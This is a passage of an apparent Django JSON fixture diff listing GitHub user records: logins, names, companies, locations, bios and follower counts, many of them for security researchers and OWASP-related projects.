"2008-04-18T18:54:25Z", + "updated_at": "2024-09-17T10:39:05Z", + "node_id": "MDQ6VXNlcjc4NDI=", + "bio": "Creator of @AppThreat ", + "is_hireable": false, + "twitter_username": "_prbh" + } +}, +{ + "model": "github.user", + "pk": 1088, + "fields": { + "nest_created_at": "2024-09-11T22:45:38.102Z", + "nest_updated_at": "2024-09-11T22:45:38.102Z", + "name": "rain", + "login": "lvyinggithub", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/34671786?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 145, + "created_at": "2017-12-19T05:47:56Z", + "updated_at": "2024-08-14T11:37:32Z", + "node_id": "MDQ6VXNlcjM0NjcxNzg2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1089, + "fields": { + "nest_created_at": "2024-09-11T22:45:42.208Z", + "nest_updated_at": "2024-09-11T22:45:42.208Z", + "name": "", + "login": "asjrosabal", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/15805802?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 25, + "created_at": "2015-11-11T19:55:17Z", + "updated_at": "2024-07-09T02:21:40Z", + "node_id": "MDQ6VXNlcjE1ODA1ODAy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1090, + "fields": { + "nest_created_at": "2024-09-11T22:45:44.601Z", + "nest_updated_at": "2024-09-22T18:44:13.286Z", + "name": "Varun Kakumani", + "login": "kakumanivrn", + "email": "kakumanivrn@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/4201693?v=4", + "company": "", + "location": "London", + "collaborators_count": 0, + "following_count": 19, + "followers_count": 32, + "public_gists_count": 3, + "public_repositories_count": 29, + "created_at": "2013-04-19T13:15:30Z", + "updated_at": "2024-06-23T18:16:44Z", + "node_id": "MDQ6VXNlcjQyMDE2OTM=", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1091, + "fields": { + "nest_created_at": "2024-09-11T22:45:50.380Z", + "nest_updated_at": "2024-09-12T01:30:30.148Z", + "name": "Jonathan L", + "login": "jonathangull", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/38224533?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2018-04-09T17:46:52Z", + "updated_at": "2024-08-23T01:55:59Z", + "node_id": "MDQ6VXNlcjM4MjI0NTMz", + "bio": "geek", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1092, + "fields": { + "nest_created_at": "2024-09-11T22:45:54.516Z", + "nest_updated_at": "2024-09-22T18:43:59.930Z", + "name": "Caroline Russell", + "login": "cerrussell", + "email": "caroline@appthreat.dev", + "avatar_url": "https://avatars.githubusercontent.com/u/80227828?v=4", + "company": "@AppThreat ", + "location": "Durham, North Carolina, US", + "collaborators_count": 0, + "following_count": 18, + "followers_count": 20, + "public_gists_count": 9, + "public_repositories_count": 16, + "created_at": "2021-03-07T23:35:29Z", + "updated_at": "2024-08-27T12:34:00Z", + "node_id": "MDQ6VXNlcjgwMjI3ODI4", + "bio": "Staff Security Engineer @AppThreat ", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1093, + "fields": { + "nest_created_at": "2024-09-11T22:45:55.323Z", + "nest_updated_at": "2024-09-11T22:45:55.323Z", + "name": "hejun01", + "login": "jackhj000", + "email": "hejun01@baidu.com", + "avatar_url": "https://avatars.githubusercontent.com/u/30014863?v=4", + "company": "baidu", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 12, + "created_at": "2017-07-09T05:09:56Z", + "updated_at": "2024-05-27T12:26:41Z", + "node_id": "MDQ6VXNlcjMwMDE0ODYz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1094, + "fields": { + "nest_created_at": "2024-09-11T22:46:04.546Z", + "nest_updated_at": "2024-09-11T22:46:04.546Z", + "name": "Daniil Morozov", + "login": "0x123456789", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/36066426?v=4", + "company": "", + "location": "Saint Petersburg", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 3, + "public_gists_count": 1, + "public_repositories_count": 10, + "created_at": "2018-02-02T07:24:09Z", + "updated_at": "2023-10-16T18:53:14Z", + "node_id": "MDQ6VXNlcjM2MDY2NDI2", + "bio": "Security Researcher, Developer", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1095, + "fields": { + "nest_created_at": "2024-09-11T22:46:15.335Z", + "nest_updated_at": "2024-09-11T23:08:42.196Z", + "name": "", + "login": "johennin", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/52281498?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2019-06-27T10:49:27Z", + "updated_at": "2024-09-01T11:59:06Z", + "node_id": "MDQ6VXNlcjUyMjgxNDk4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1096, + "fields": { + "nest_created_at": "2024-09-11T22:46:16.649Z", + "nest_updated_at": "2024-09-22T18:44:05.672Z", + "name": "", + "login": "almaz045", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/63047433?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2020-04-02T10:23:54Z", + "updated_at": "2024-09-02T12:07:24Z", + "node_id": "MDQ6VXNlcjYzMDQ3NDMz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1097, + "fields": { + "nest_created_at": "2024-09-11T22:46:20.335Z", + "nest_updated_at": "2024-09-11T22:46:20.335Z", + "name": "Steve Pritchard", + "login": "sjpritchard", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1045715?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 10, + "followers_count": 5, + "public_gists_count": 1, + "public_repositories_count": 17, + "created_at": "2011-09-12T21:37:02Z", + "updated_at": "2024-09-03T11:11:25Z", + "node_id": "MDQ6VXNlcjEwNDU3MTU=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1098, + "fields": { + "nest_created_at": "2024-09-11T22:46:23.183Z", + "nest_updated_at": "2024-09-11T22:46:23.183Z", + "name": "", + "login": "zhcoden", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/140381970?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-07-24T07:47:01Z", + "updated_at": "2024-05-19T11:44:21Z", + "node_id": "U_kgDOCF4PEg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1099, + "fields": { + "nest_created_at": "2024-09-11T22:46:25.249Z", + "nest_updated_at": "2024-09-11T22:46:25.249Z", + "name": "", + "login": "lm-sig", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/54909895?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2019-09-04T18:15:01Z", + "updated_at": "2023-12-04T13:46:22Z", + "node_id": "MDQ6VXNlcjU0OTA5ODk1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1100, + "fields": { + "nest_created_at": "2024-09-11T22:46:29.045Z", + "nest_updated_at": "2024-09-11T22:46:29.045Z", + "name": "Kaio Rafael (kaiux)", + "login": "kaiorafael", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3171389?v=4", + "company": "@aws", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2013-01-02T18:45:46Z", + "updated_at": "2024-07-24T13:20:05Z", + "node_id": "MDQ6VXNlcjMxNzEzODk=", + "bio": "I am Security Researcher", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1101, + "fields": { + "nest_created_at": "2024-09-11T22:46:30.271Z", + "nest_updated_at": "2024-09-12T01:39:46.030Z", + "name": "Andrew Pollock", + "login": "andrewpollock", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6906046?v=4", + "company": "Google Open Source Security Team", + "location": "Brisbane", + "collaborators_count": 0, + "following_count": 12, + "followers_count": 141, + "public_gists_count": 3, + "public_repositories_count": 27, + "created_at": "2014-03-10T10:41:58Z", + "updated_at": "2024-09-08T23:39:24Z", + "node_id": "MDQ6VXNlcjY5MDYwNDY=", + "bio": "I'm a software engineer at Google, working on OSV.dev, which ties into open source vulnerability management and related software supply chain security.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1102, + "fields": { + "nest_created_at": "2024-09-11T22:46:31.524Z", + "nest_updated_at": "2024-09-11T22:46:31.524Z", + "name": "Yunus AYDIN", + "login": "aydinnyunus", + "email": "aydinnyunus@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/52822869?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 75, + "followers_count": 910, + "public_gists_count": 6, + "public_repositories_count": 78, + "created_at": "2019-07-12T10:50:49Z", + "updated_at": "2024-09-02T20:02:09Z", + "node_id": "MDQ6VXNlcjUyODIyODY5", + "bio": "", + "is_hireable": true, + "twitter_username": "aydinnyunuss" + } +}, +{ + "model": "github.user", + "pk": 1103, + "fields": { + "nest_created_at": "2024-09-11T22:46:32.851Z", + "nest_updated_at": "2024-09-11T22:46:32.851Z", + "name": "Nadir", + "login": "Nadir-CS", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/88508418?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2021-08-05T18:19:40Z", + "updated_at": "2023-03-02T19:06:51Z", + "node_id": "MDQ6VXNlcjg4NTA4NDE4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1104, + "fields": { + "nest_created_at": "2024-09-11T22:46:34.091Z", + "nest_updated_at": "2024-09-13T17:09:36.696Z", + "name": "Manuel Nader", + "login": "manuel-cohere", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/167128611?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2024-04-15T18:38:14Z", + "updated_at": "2024-06-03T17:30:49Z", + "node_id": "U_kgDOCfYuIw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1105, + "fields": { + "nest_created_at": "2024-09-11T22:46:58.692Z", + "nest_updated_at": "2024-09-22T19:42:22.712Z", + "name": "Florian Heubeck", + "login": "heubeck", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/40993644?v=4", + "company": "@MediaMarktSaturn ", + "location": "Ingolstadt, Bavaria, Germany", + "collaborators_count": 0, + "following_count": 11, + "followers_count": 46, + "public_gists_count": 1, + "public_repositories_count": 41, + "created_at": "2018-07-09T09:17:48Z", + "updated_at": "2024-09-16T14:06:19Z", + "node_id": "MDQ6VXNlcjQwOTkzNjQ0", + "bio": "Principal Engineer @MediaMarktSaturn Technology • Organizer @jug-in • Cloud & GitOps Fanatic @DOAGeV / @dcnc-eu", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1106, + "fields": { + "nest_created_at": "2024-09-11T22:48:20.789Z", + "nest_updated_at": "2024-09-22T18:40:05.827Z", + "name": "Martin Nocker", + "login": "MartinNoc", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/10062471?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2014-12-03T14:49:31Z", + "updated_at": "2024-06-27T06:27:13Z", + "node_id": "MDQ6VXNlcjEwMDYyNDcx", + "bio": "", + "is_hireable": false, + "twitter_username": "nockermartin" + } +}, +{ + "model": "github.user", + "pk": 1107, + "fields": { + "nest_created_at": "2024-09-11T22:48:28.720Z", + "nest_updated_at": "2024-09-22T18:40:17.199Z", + "name": "Nikolai Khechumov", + "login": "ntoskernel", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/11661706?v=4", + "company": "@Yandex", + "location": "", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 11, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2015-03-26T09:22:18Z", + "updated_at": "2024-09-14T14:17:41Z", + "node_id": "MDQ6VXNlcjExNjYxNzA2", + "bio": "Security Engineer", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1108, + "fields": { + "nest_created_at": "2024-09-11T22:48:35.708Z", + "nest_updated_at": "2024-09-22T18:40:21.213Z", + "name": "Abhijit Chatterjee", + "login": "abhijitio", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/19294879?v=4", + "company": "", + "location": "Bangalore", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2016-05-10T22:04:08Z", + "updated_at": "2024-08-07T20:22:06Z", + "node_id": "MDQ6VXNlcjE5Mjk0ODc5", + "bio": "Kubernetespedia", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1109, + "fields": { + "nest_created_at": "2024-09-11T22:48:47.366Z", + "nest_updated_at": "2024-09-22T18:40:29.781Z", + "name": "OWASP Four Clover", + "login": "fourcloverorg", + "email": "contact@fourclover.org", + "avatar_url": "https://avatars.githubusercontent.com/u/132184099?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2023-04-30T04:31:20Z", + "updated_at": "2024-09-15T12:52:55Z", + "node_id": "O_kgDOB-D4Iw", + "bio": "", + "is_hireable": false, + "twitter_username": "fourcloverorg" + } +}, +{ + "model": "github.user", + "pk": 1110, + "fields": { + "nest_created_at": "2024-09-11T22:48:50.799Z", + "nest_updated_at": "2024-09-22T18:40:32.974Z", + "name": "Vaishno Chaitanya", + "login": "vchan-in", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/17123227?v=4", + "company": "", + "location": "India", + "collaborators_count": 0, + "following_count": 11, + "followers_count": 37, + "public_gists_count": 3, + "public_repositories_count": 41, + "created_at": "2016-02-08T12:57:33Z", + "updated_at": "2024-09-13T12:56:32Z", + "node_id": "MDQ6VXNlcjE3MTIzMjI3", + "bio": "Techie | Hacker.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1111, + "fields": { + "nest_created_at": "2024-09-11T22:48:56.418Z", + "nest_updated_at": "2024-09-22T18:40:56.943Z", + "name": "Cervantes", + "login": "CervantesSec", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/104642981?v=4", + "company": "", + "location": "Spain", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 46, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2022-04-29T16:04:19Z", + "updated_at": "2024-02-04T15:30:24Z", + "node_id": "O_kgDOBjy5pQ", + "bio": "Cervantes is an opensource collaborative paltform for pentesters or red teams", + "is_hireable": false, + "twitter_username": "Cervantes_Sec" + } +}, +{ + "model": "github.user", + "pk": 1112, + "fields": { + "nest_created_at": "2024-09-11T22:49:03.388Z", + "nest_updated_at": "2024-09-22T20:24:40.828Z", + "name": "Alexandre ZANNI", + "login": "noraj", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/16578570?v=4", + "company": "Rawsec", + "location": "FRANCE", + "collaborators_count": 0, + "following_count": 32, + "followers_count": 1762, + "public_gists_count": 29, + "public_repositories_count": 693, + "created_at": "2016-01-06T15:48:38Z", + "updated_at": "2024-08-24T11:30:53Z", + "node_id": "MDQ6VXNlcjE2NTc4NTcw", + "bio": "I'm a Cybersecurity engineer, security auditor, pentester and ethical hacker.", + "is_hireable": false, + "twitter_username": "noraj_rawsec" + } +}, +{ + "model": "github.user", + "pk": 1113, + "fields": { + "nest_created_at": "2024-09-11T22:49:03.774Z", + "nest_updated_at": "2024-09-22T18:40:59.701Z", + "name": "Ruben Mesquida", + "login": "mesquidar", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/16049893?v=4", + "company": "", + "location": "Spain", + "collaborators_count": 0, + "following_count": 23, + "followers_count": 160, + "public_gists_count": 0, + "public_repositories_count": 9, + "created_at": "2015-11-27T17:07:51Z", + "updated_at": "2024-08-15T11:03:58Z", + "node_id": "MDQ6VXNlcjE2MDQ5ODkz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1114, + "fields": { + "nest_created_at": "2024-09-11T22:49:08.368Z", + "nest_updated_at": "2024-09-11T22:49:08.368Z", + "name": "Riccardo Mollo", + "login": "rm1984", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/10762991?v=4", + "company": "", + "location": "Turin, Italy", + "collaborators_count": 0, + "following_count": 25, + "followers_count": 19, + "public_gists_count": 3, + "public_repositories_count": 16, + "created_at": "2015-01-29T19:47:40Z", + "updated_at": "2023-10-21T06:56:03Z", + "node_id": "MDQ6VXNlcjEwNzYyOTkx", + "bio": "SysAdmin / PenTester with passion about Photography", + "is_hireable": true, + "twitter_username": "riccardomollo" + } +}, +{ + "model": "github.user", + "pk": 1115, + "fields": { + "nest_created_at": "2024-09-11T22:49:10.019Z", + "nest_updated_at": "2024-09-22T18:40:45.182Z", + "name": "", + "login": "EmiliaChovancova", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/44211508?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2018-10-16T19:23:45Z", + "updated_at": "2023-03-08T20:48:10Z", + "node_id": "MDQ6VXNlcjQ0MjExNTA4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1116, + "fields": { + "nest_created_at": "2024-09-11T22:49:26.219Z", + "nest_updated_at": "2024-09-22T18:41:03.415Z", + "name": "Lütfü Mert Ceylan", + "login": "lutfumertceylan", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/53023641?v=4", + "company": "", + "location": "Warsaw", + "collaborators_count": 0, + "following_count": 37, + "followers_count": 221, + "public_gists_count": 0, + "public_repositories_count": 13, + "created_at": "2019-07-17T23:22:00Z", + "updated_at": "2024-05-22T21:46:47Z", + "node_id": "MDQ6VXNlcjUzMDIzNjQx", + "bio": "security researcher", + "is_hireable": false, + "twitter_username": "lutfumertceylan" + } +}, +{ + "model": "github.user", + "pk": 1117, + "fields": { + "nest_created_at": "2024-09-11T22:49:30.568Z", + "nest_updated_at": "2024-09-22T18:41:08.612Z", + "name": "", + "login": "RoseSecurity", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/72598486?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 39, + "followers_count": 1262, + "public_gists_count": 18, + "public_repositories_count": 25, + "created_at": "2020-10-09T07:41:37Z", + "updated_at": "2024-09-21T03:50:46Z", + "node_id": "MDQ6VXNlcjcyNTk4NDg2", + "bio": "Platform Engineer, Open Source, Go, Terraform", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1118, + "fields": { + "nest_created_at": "2024-09-11T22:49:33.591Z", + "nest_updated_at": "2024-09-13T05:22:21.219Z", + "name": "Justin Bollinger", + "login": "bandrel", + "email": "justin.bollinger@trustedsec.com", + "avatar_url": "https://avatars.githubusercontent.com/u/3598052?v=4", + "company": "@TrustedSec", + "location": "Ohio, USA", + "collaborators_count": 0, + "following_count": 14, + "followers_count": 90, + "public_gists_count": 14, + "public_repositories_count": 45, + "created_at": "2013-02-14T22:49:38Z", + "updated_at": "2024-06-17T13:47:35Z", + "node_id": "MDQ6VXNlcjM1OTgwNTI=", + "bio": "Principal Security Consultant @TrustedSec", + "is_hireable": false, + "twitter_username": "bandrel" + } +}, +{ + "model": "github.user", + "pk": 1119, + "fields": { + "nest_created_at": "2024-09-11T22:49:38.443Z", + "nest_updated_at": "2024-09-22T18:41:33.009Z", + "name": "OWASP Domain Protect", + "login": "domain-protect", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/107151354?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 18, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2022-06-08T20:37:53Z", + "updated_at": "2023-05-28T09:34:54Z", + "node_id": "O_kgDOBmL_-g", + "bio": "", + "is_hireable": false, + "twitter_username": "domain_protect" + } +}, +{ + "model": "github.user", + "pk": 1120, + "fields": { + "nest_created_at": "2024-09-11T22:49:41.480Z", + "nest_updated_at": "2024-09-13T05:22:01.343Z", + "name": "Uros", + "login": "soru23", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/17911999?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2016-03-17T18:43:32Z", + "updated_at": "2024-08-14T21:21:54Z", + "node_id": "MDQ6VXNlcjE3OTExOTk5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1121, + "fields": { + "nest_created_at": "2024-09-11T22:49:42.942Z", + "nest_updated_at": "2024-09-22T19:45:57.502Z", + "name": "Paul Schwarzenberger", + "login": "paulschwarzenberger", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/26303407?v=4", + "company": "Celidor", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 15, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2017-03-09T13:33:05Z", + "updated_at": "2024-09-21T18:05:56Z", + "node_id": "MDQ6VXNlcjI2MzAzNDA3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1122, + "fields": { + "nest_created_at": "2024-09-11T22:50:10.562Z", + "nest_updated_at": "2024-09-22T18:41:29.853Z", + "name": "", + "login": "cleo2525", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/51095139?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2019-05-27T18:49:40Z", + "updated_at": "2024-07-16T22:08:22Z", + "node_id": "MDQ6VXNlcjUxMDk1MTM5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1123, + "fields": { + "nest_created_at": "2024-09-11T22:50:26.079Z", + "nest_updated_at": "2024-09-22T18:41:55.820Z", + "name": "Cider Security Research", + "login": "cider-security-research", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/101509203?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 102, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2022-03-13T13:04:55Z", + "updated_at": "2024-04-24T16:58:25Z", + "node_id": "O_kgDOBgzoUw", + "bio": "Research by Cider Security", + "is_hireable": false, + "twitter_username": "cider_sec" + } +}, +{ + "model": "github.user", + "pk": 1124, + "fields": { + "nest_created_at": "2024-09-11T22:50:29.191Z", + "nest_updated_at": "2024-09-13T05:21:40.823Z", + "name": "Dominik Miklaszewski", + "login": "dominikmi", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/45730823?v=4", + "company": "", + "location": "Warsaw, Poland", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2018-12-09T10:02:16Z", + "updated_at": "2024-08-25T12:48:21Z", + "node_id": "MDQ6VXNlcjQ1NzMwODIz", + "bio": "OopsOps!", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1125, + "fields": { + "nest_created_at": "2024-09-11T22:50:35.164Z", + "nest_updated_at": "2024-09-22T18:42:05.973Z", + "name": "mimosa", + "login": "securecoding-mimosa", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/96038722?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2021-12-13T05:26:55Z", + "updated_at": "2022-08-25T03:50:42Z", + "node_id": "O_kgDOBblvQg", + "bio": "touch me not", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1126, + "fields": { + "nest_created_at": "2024-09-11T22:50:38.927Z", + "nest_updated_at": "2024-09-22T18:42:09.582Z", + "name": "WeiLiang", + "login": "WeiLiangLOL", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/11328135?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 4, + "public_gists_count": 2, + "public_repositories_count": 6, + "created_at": "2015-03-05T07:48:25Z", + "updated_at": "2024-08-27T15:16:41Z", + "node_id": "MDQ6VXNlcjExMzI4MTM1", + "bio": "I'm a pretty good developer. I think.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1127, + "fields": { + "nest_created_at": "2024-09-11T22:50:44.701Z", + "nest_updated_at": "2024-09-22T18:42:15.287Z", + "name": "Coraza Web Application Firewall", + "login": "corazawaf", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/90621731?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 114, + "public_gists_count": 0, + "public_repositories_count": 17, + "created_at": "2021-09-13T12:29:34Z", + "updated_at": "2023-05-25T10:17:01Z", + "node_id": "MDEyOk9yZ2FuaXphdGlvbjkwNjIxNzMx", + "bio": "Coraza Web Application Firewall repositories", + "is_hireable": false, + "twitter_username": "corazaio" + } +}, +{ + "model": "github.user", + "pk": 1128, + "fields": { + "nest_created_at": "2024-09-11T22:50:51.010Z", + "nest_updated_at": "2024-09-22T19:48:50.650Z", + "name": "Juan Pablo Tosso", + "login": "jptosso", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1236942?v=4", + "company": "Traceable AI", + "location": "Vigo, Spain", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 47, + "public_gists_count": 13, + "public_repositories_count": 55, + "created_at": "2011-12-02T20:34:52Z", + "updated_at": "2024-09-18T17:06:42Z", + "node_id": "MDQ6VXNlcjEyMzY5NDI=", + "bio": "I'm a human", + "is_hireable": true, + "twitter_username": "jptosso" + } +}, +{ + "model": "github.user", + "pk": 1129, + "fields": { + "nest_created_at": "2024-09-11T22:50:52.706Z", + "nest_updated_at": "2024-09-22T18:42:19.757Z", + "name": "José Carlos Chávez", + "login": "jcchavezs", + "email": "josecarlos.chavez@okta.com", + "avatar_url": "https://avatars.githubusercontent.com/u/3075074?v=4", + "company": "@okta ", + "location": "Barcelona - Cataluña", + "collaborators_count": 0, + "following_count": 71, + "followers_count": 160, + "public_gists_count": 15, + "public_repositories_count": 238, + "created_at": "2012-12-18T20:12:29Z", + "updated_at": "2024-09-18T22:31:21Z", + "node_id": "MDQ6VXNlcjMwNzUwNzQ=", + "bio": "Security Software Engineer @ Okta, OWASP Coraza co-leader and Peruvian llama ambassador.", + "is_hireable": false, + "twitter_username": "jcchavezs" + } +}, +{ + "model": "github.user", + "pk": 1130, + "fields": { + "nest_created_at": "2024-09-11T22:50:56.837Z", + "nest_updated_at": "2024-09-22T19:48:45.892Z", + "name": "Anuraag (Rag) Agrawal", + "login": "anuraaga", + "email": "anuraaga@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/198344?v=4", + "company": "Earth", + "location": "Yokohama, Japan", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 227, + "public_gists_count": 26, + "public_repositories_count": 376, + "created_at": "2010-02-06T12:52:17Z", + "updated_at": "2024-09-05T03:26:56Z", + "node_id": "MDQ6VXNlcjE5ODM0NA==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1131, + "fields": { + "nest_created_at": "2024-09-11T22:51:02.014Z", + "nest_updated_at": "2024-09-11T22:51:02.014Z", + "name": "Tit Petric", + "login": "titpetric", + "email": "black@scene-si.org", + "avatar_url": "https://avatars.githubusercontent.com/u/233360?v=4", + "company": "Tyk Technologies", + "location": "Porec, Croatia", + "collaborators_count": 0, + "following_count": 25, + "followers_count": 219, + "public_gists_count": 17, + "public_repositories_count": 99, + "created_at": "2010-03-30T13:32:43Z", + "updated_at": "2024-07-29T10:20:31Z", + "node_id": "MDQ6VXNlcjIzMzM2MA==", + "bio": "", + "is_hireable": true, + "twitter_username": "titpetric" + } +}, +{ + "model": "github.user", + "pk": 1132, + "fields": { + "nest_created_at": "2024-09-11T22:51:05.111Z", + "nest_updated_at": "2024-09-11T22:51:05.111Z", + 